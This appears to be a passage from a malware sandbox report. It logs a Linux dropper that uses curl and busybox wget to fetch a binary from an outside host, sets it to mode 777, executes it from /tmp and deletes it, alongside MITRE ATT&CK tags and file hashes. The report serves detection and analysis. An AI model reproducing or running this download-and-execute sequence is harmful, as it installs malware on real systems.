/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- System Network Configuration Discovery
PID:1008
-
-
/bin/chmodchmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵PID:1011
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97